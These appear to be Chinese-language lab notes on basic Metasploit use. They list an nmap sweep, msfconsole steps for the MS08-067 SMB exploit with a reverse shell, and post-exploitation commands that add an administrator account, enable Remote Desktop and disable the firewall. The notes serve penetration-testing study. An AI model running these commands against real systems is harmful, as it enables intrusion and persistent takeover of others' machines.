Msf 基本用法
Msfconsole
Help
nmap -sn 192.168.208.0/24 主機發現
滲透攻擊過程 需要xp用戶登錄系統後纔可以利用成功。
1.search MS08-067
2. use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
3. show payloads
4. set payload generic/shell_reverse_tcp
5. show targets
6. show options
7. set RHOST 192.168.208.166
8. set LHOST 192.168.1.36
9. exploit
提權過程
>net user lilei 123456 /add --添加用戶
>net localgroup administrators lilei /add --將lilei添加到administrators用戶組
>netstat -na --查看開放端口
>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f --打開遠程桌面3389端口
>netsh firewall set opmode disable --關閉防火牆
meterpreter
Ps
netstat -ano |findstr 4444 可以查出 meterpreter 建立的host 進程。 比如爲984
Migrate 移到 explore.exe 進程後, 即使host 殺死984進程, host 中仍然可以通過netstat -ano |findstr 4444 看到 ,猜測此時的984 已經不是進程號而是線程號了。
跳板攻擊: 待續
Payload : 待續